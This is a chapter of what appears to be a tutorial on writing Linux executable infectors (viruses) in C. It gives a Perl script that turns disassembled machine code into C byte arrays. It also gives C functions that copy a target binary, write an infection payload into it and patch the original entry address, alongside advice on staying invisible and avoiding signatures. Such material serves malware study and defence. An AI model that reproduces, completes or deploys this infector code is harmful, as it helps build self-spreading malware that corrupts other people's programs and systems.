3. One step closer to the edge (i)

 

To take a significant step forward, you must make a series of finite improvements.

 Donald J. Atwood, General Motors

This chapter introduces the framework of a first-stage infector written in plain C. The program inserts and activates one chunk of code in the executables specified on the command line. It is not insertable itself.

The code is split into many parts that manipulate a central data structure. The idea is to replace some of these parts in later chapters to implement improvements and different infection methods. Parts are shown in random order and without any #include statements or prototypes. Identifiers prefixed with TEVWH_ are defined in the generated file config.h. See Verifying installed packages. If you need full details, a look into the sources of this document should do. Mirrors shows where to get them.

3.1. Dressing up binary code

This script is used throughout the document to convert binary files into valid C code, i.e. the definition of a byte array. This could have been a small filter written in perl(1), but we actually need a lot of features.

We need to process the output of both ndisasm and objdump, on multiple platforms. Examples for valid input (i386, sparc, alpha):

08048080  6A04              push byte +0x4
10074:	82 10 20 04	mov	4, %g1
1200000b0:	02 00 bb 27	ldah	gp,2(t12)

The __attribute__ clause is explained in A section called .text.

Initializing the array with string literals (looking like \xDE\xAD\xBE\xEF) is easier. The terminating zero would not work with Doing it in C, however. But then using a list of hexadecimal numbers introduces separating commas, requiring special treatment of the last line.

If the command line option -last_line_is_ofs is passed to the program then the last line of disassembly is meant to specify an offset into the code. Actually it's just the last byte of that line. You are free to use any dummy operation, see the example input above. A real world example is at Infection #1. The last instruction itself is not emitted to the byte array. Instead the enum constant ENTRY_POINT_OFS is defined.

Source: src/platform/disasm.pl
#!/usr/bin/perl -sw
use strict;

my $LINE = "  %-30s /* %-32s */\n";

$::identfier = 'main' if (!defined($::identfier));
$::size = '' if (!defined($::size));
$::align = '8' if (!defined($::align));
$::section = '.text' if (!defined($::section));

printf "const unsigned char %s[%s]\n", $::identfier, $::size;
print "__attribute__ (( aligned($::align), section(\"$::section\") )) =\n";
print "{\n";

my $code_size = 0;
my @line;
while(<>)
{
  s/^\s+//;		# trim leading white space
  s/\s+$//;		# trim trailing white space
  s/\s+[!;].*//;	# trim trailing comments

  my $addr = (split(/[:\s]+/))[0];
  s/[A-Fa-f0-9]+:?\s+//;

  my @code = split(/\s\s+/);
  my $code = $code[0];
  $code =~ s/\s//g;	# make objdump look like ndisasm

  $code_size += length($code) / 2;
  my $dump = '0x' . substr($code, 0, 2);
  for(my $i = 2; $i < length($code); $i += 2)
  {
    $dump .= ',0x' . substr($code, $i, 2);
  }
  push @line, [ $addr . ': ' . join(' ', @code[1..$#code]), $code, $dump ]
}

my $nr = 0;
my $max = $#line;
$max -= 1 if (defined($::last_line_is_ofs));
while($nr < $max)
{
  printf $LINE, $line[$nr][2] . ',', $line[$nr][0];
  $nr++;
}
printf $LINE, $line[$nr][2], $line[$nr][0];
printf "}; /* %d bytes (%#x) */\n", $code_size, $code_size;
if (defined($::last_line_is_ofs))
{
  my $ofs = substr($line[$nr + 1][1], -2, 2);
  printf "enum { ENTRY_POINT_OFS = 0x%x };\n", hex($ofs);
}

3.2. target.h

3.3. main

3.4. target_open

Modifying a file in place, as opposed to writing a copy, is possible but difficult. Moreover, between the first and the final modification the contents of the target are invalid. Imagine a worst-case scenario of a virus infecting /bin/sh being interrupted by a power failure (or an emergency shutdown by a hectic admin).

There are a few approaches to change a file while copying.

Passing MAP_PRIVATE in the flags argument of mmap(2) activates copy-on-write semantics. You can read and write as if you had chosen the read-in-one-go method, but the implementation is more efficient. Unmodified pages are loaded directly from the file. Under low-memory conditions these pages can be discarded without saving them to swap space.

Source: src/one_step_closer/open.inc
bool target_open(Target* t, const char* src_filename)
{
  static const char suffix[] = "_infected"; 

  const char* base;
  size_t len;
  char* dst_filename;

  TRACE(stderr, "target_open(%s)\n", src_filename);
  base = strrchr(src_filename, '/');
  base = (base == 0) ? src_filename : base + 1;

  len = strlen(base);
  dst_filename = malloc(len + sizeof(suffix));
  if (dst_filename == 0)
  {
    TRACE(stderr, "Out of memory allocating %lu bytes.\n",
      (unsigned long)(len + sizeof(suffix)));
    return false;
  }

  memcpy(dst_filename, base, len);
  memcpy(dst_filename + len, suffix, sizeof(suffix));

  t->fd_src = open(src_filename, O_RDONLY);
  if (t->fd_src >= 0)
  {
    t->filesize = lseek(t->fd_src, 0, SEEK_END);
    if ((off_t)-1 != t->filesize)
    {
      t->aligned_filesize = ALIGN_UP(t->filesize);
      t->p.v = mmap(0, t->filesize, PROT_READ | PROT_WRITE,
	MAP_PRIVATE, t->fd_src, 0);
      if (MAP_FAILED != t->p.v)
      {
        t->fd_dst = open(dst_filename, O_WRONLY | O_CREAT | O_TRUNC, 0775);
	if (t->fd_dst >= 0)
	{
	  free(dst_filename);
	  return true;
        }
	perror("open");
      }
      else
	perror("mmap");
    }
    else
      perror("lseek");
  }
  else
    perror("open");
  free(dst_filename);
  return false;
}

3.5. target_close

3.6. target_is_suitable

A visible virus is a dead virus. Breaking things is quite the opposite of invisibility. So before you even think about polymorphism and stealth mechanisms you should make sure your code does nothing unexpected. On the other hand, exhaustive checks of target files will severely increase code size. And verifying signatures and other constant values is likely to make the virus code itself a constant signature. A better approach is to compare the target with the host executable currently running the virus.

Finding a meaningful set of tests is an art in itself. For example, some executables of Red Hat 8.0 have an additional program header of type GNU_EH_FRAME. This means that e_phnum can differ between infector and target.

3.7. target_patch_entry_addr #1

This function is independent of the chosen infection method. The directory name e1 means that this is the first (orthogonal) implementation. Anyway, without this function the behavior of the target is not modified. If the infection method prevents double infection by design, this can be used for vaccination in the true meaning of the word: infection with a deactivated mutation makes the target immune against less friendly attackers.

3.8. target_write_infection #1

infection is an array of bytes generated by Dressing up binary code. Constant ENTRY_POINT_OFS points to the location inside this array to patch with the original entry address.

Source: src/one_step_closer/write_infection.inc
unsigned target_write_infection(Target* t)
{
  enum { ADDR_SIZE = sizeof(((Target*)0)->original_entry) }; 
  enum { REST_OFS = ENTRY_POINT_OFS + ADDR_SIZE };

  TRACE(stderr, "target_write_infection ENTRY_POINT_OFS=%d\n",
    ENTRY_POINT_OFS);

  /* i386: first byte is the opcode for "push" */
  write(t->fd_dst, infection, ENTRY_POINT_OFS);

  /* i386: next four bytes is the address to "ret" to */
  write(t->fd_dst, &t->original_entry, sizeof(t->original_entry));

  /* rest of infective code */
  write(t->fd_dst, infection + REST_OFS, sizeof(infection) - REST_OFS);

  return sizeof(infection);
}